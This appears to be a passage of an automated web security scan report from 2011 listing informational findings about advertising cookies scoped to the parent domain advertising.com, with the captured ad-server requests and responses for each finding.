Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=QOl+NFJwHob0Fh6sIWwJoa0itKPCC0nhcJpwEg02FSMBdbdhETwihXIxEwjmGSMBxGehETAQvaIxEQW4FSMBLpphETQghXIxEgN5FSMB6ijhETAmhXIxEAY4FSMBdDmhETA/yaIxEAVZGSMBYimhETA3WaIxEQY4FSMBFGehETAxBaIxEU1aGSMBbTehETQwBaIxEYnXGSMBWGohETgQvaIxEogmGSMBxmphETQRgaIxE0soGSMB8mphEHZAmZOiGeZj0jw+NXUbtiGA8MoBj7a+AcsmGMuAEOpx/aLuBoKuGg/smJwoka8vzClALRqx/WaxAMdPGNwrQQwdIaEhq62ApVmBuTqHIUbNG4WtrCQIzawIwOICM/oRvdr0IwKvG+G; F1=BA5U63EBAAAABAAAAoBA4BA; BASE=x7Q9ji23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/P!; ROLL=U6APXjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029516.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:08:55 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 620
Date: Thu, 16 Jun 2011 19:08:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: F1=BcMV63EBAAAABAAAAsBA2BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/P5PEEVdwP!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpKPi7sVuHG!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: 66502577=_4dfa54c7,8658162855,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.3;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/s
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=77103321/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=QOl+NFJwHob0Fh6sIWwJoa0itKPCC0nhcJpwEg02FSMBdbdhETwihXIxEwjmGSMBxGehETAQvaIxEQW4FSMBLpphETQghXIxEgN5FSMB6ijhETAmhXIxEAY4FSMBdDmhETA/yaIxEAVZGSMBYimhETA3WaIxEQY4FSMBFGehETAxBaIxEU1aGSMBbTehETQwBaIxEYnXGSMBWGohETgQvaIxEogmGSMBxmphETQRgaIxE0soGSMB8mphEHZAmZOiGeZj0jw+NXUbtiGA8MoBj7a+AcsmGMuAEOpx/aLuBoKuGg/smJwoka8vzClALRqx/WaxAMdPGNwrQQwdIaEhq62ApVmBuTqHIUbNG4WtrCQIzawIwOICM/oRvdr0IwKvG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
F1=BA5U63EBAAAABAAAAkBA4BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
BASE=x7Q9ii23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
ROLL=U6APWjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/A!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
77103321=_4dfa5390,3637355511,768034^903753^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=77103321/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308251022832&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=QJl+NFJwHob0Fi6sIWwJoa4itKPCC0nxcJpwEg02FTMBdbdxETwihXMxEwjmGTMBxGexETAQvaMxEQW4FTMBLppxETQghXMxEgN5FTMB6ijxETAmhXMxEAY4FTMBdDmxETA/yaMxEAVZGTMBYimxETA3WaMxEQY4FTMBFGexETAxBaMxEU1aGTMBbTexETQwBaMxEYnXGTMBWGoxETgQvaMxEogmGTMBxmpxETQRgaMxE0soGTMB8mpxEHZAmZOiGfZj0jw+NXYbtiGA8MoRj7a+AcsmGNuAEOpBAbLuBoKuGh/smJwokaAwzClALRqBAXaxAMdPGOwrQQwdIaIhq62ApVmRuTqHIUbNG5WtrCQIza0IwOICM/ohvdr0IwKvG/G; F1=BMlU63EBAAAABAAAAgBA6BA; BASE=x7Q9hi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlC!; ROLL=U6APRjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKH!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.903753.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:03:44 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 19:03:44 GMT
Content-Length: 1051
Connection: close
Set-Cookie: C2=QOl+NFJwHob0Fh6sIWwJoa0itKPCC0nhcJpwEg02FSMBdbdhETwihXIxEwjmGSMBxGehETAQvaIxEQW4FSMBLpphETQghXIxEgN5FSMB6ijhETAmhXIxEAY4FSMBdDmhETA/yaIxEAVZGSMBYimhETA3WaIxEQY4FSMBFGehETAxBaIxEU1aGSMBbTehETQwBaIxEYnXGSMBWGohETgQvaIxEogmGSMBxmphETQRgaIxE0soGSMB8mphEHZAmZOiGeZj0jw+NXUbtiGA8MoBj7a+AcsmGMuAEOpx/aLuBoKuGg/smJwoka8vzClALRqx/WaxAMdPGNwrQQwdIaEhq62ApVmBuTqHIUbNG4WtrCQIzawIwOICM/oRvdr0IwKvG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: F1=BA5U63EBAAAABAAAAkBA4BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: BASE=x7Q9ii23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: ROLL=U6APWjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/A!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:03:44 GMT; path=/
Set-Cookie: 77103321=_4dfa5390,3637355511,768034^903753^1183^0,0_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/AAS/iview/260696261/direct;wi.728;hi.90/01/3637355511?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000903753/cstr=77103321=_4d
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
F1=B4qT63EBAAAABAAAAMBAACA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3EQRKdseJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpiOE5GotJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
83819639=_4dfa4eae,6403574311,768034^994447^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308249772461&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=41k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; F1=BgXT63EBAAAABAAAAIBACCA; BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaKH!; ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQJ!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:42:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:42:54 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: F1=B4qT63EBAAAABAAAAMBAACA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3EQRKdseJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpiOE5GotJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: 83819639=_4dfa4eae,6403574311,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mn
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=3Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXActiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
F1=BcPR63EBAAAABAAAAkAAQCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wJA3zrmHH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLFkisFCNJJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
83891309=_4dfa44f7,5772552350,768034^981604^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308247285733&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=/Ok+NFJwHob0Fu6sIWwJoaojtKPCC0nxfJpwEg02FfMBdbdxHTwihX8xEwjmGfMBxGexHTAQva8xEQW4FfMBLppxHTQghX8xEgN5FfMB6ijxHTAmhX8xEAY4FfMBdDmxHTA/ya8xEAVZGfMBYimxHTA3Wa8xEQY4FfMBFGexHTAxBa8xEU1aGfMBbTexHTQwBa8xEYnXGfMBWGoxHTgQva8xEogmGfMBxmpxHTQRga8xE0soGfMB8mpxHHZAmZOiGrZj0jw+NXsbtiGA8MoRm7a+AcsmGZuAEOpBDbLuBoKuGt/smJwokawwzClALRqBDXaxAMdPGawrQQwdIa4h; F1=B87Q63EBAAAABAAAAgAASCA; BASE=x7Q9Si23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1A!; ROLL=U6APBjemptEW07uaB4l2FnxkoJDmaLF!; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:01:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 18:01:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=3Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXActiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: F1=BcPR63EBAAAABAAAAkAAQCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wJA3zrmHH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLFkisFCNJJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: 83891309=_4dfa44f7,5772552350,768034^981604^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000981
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
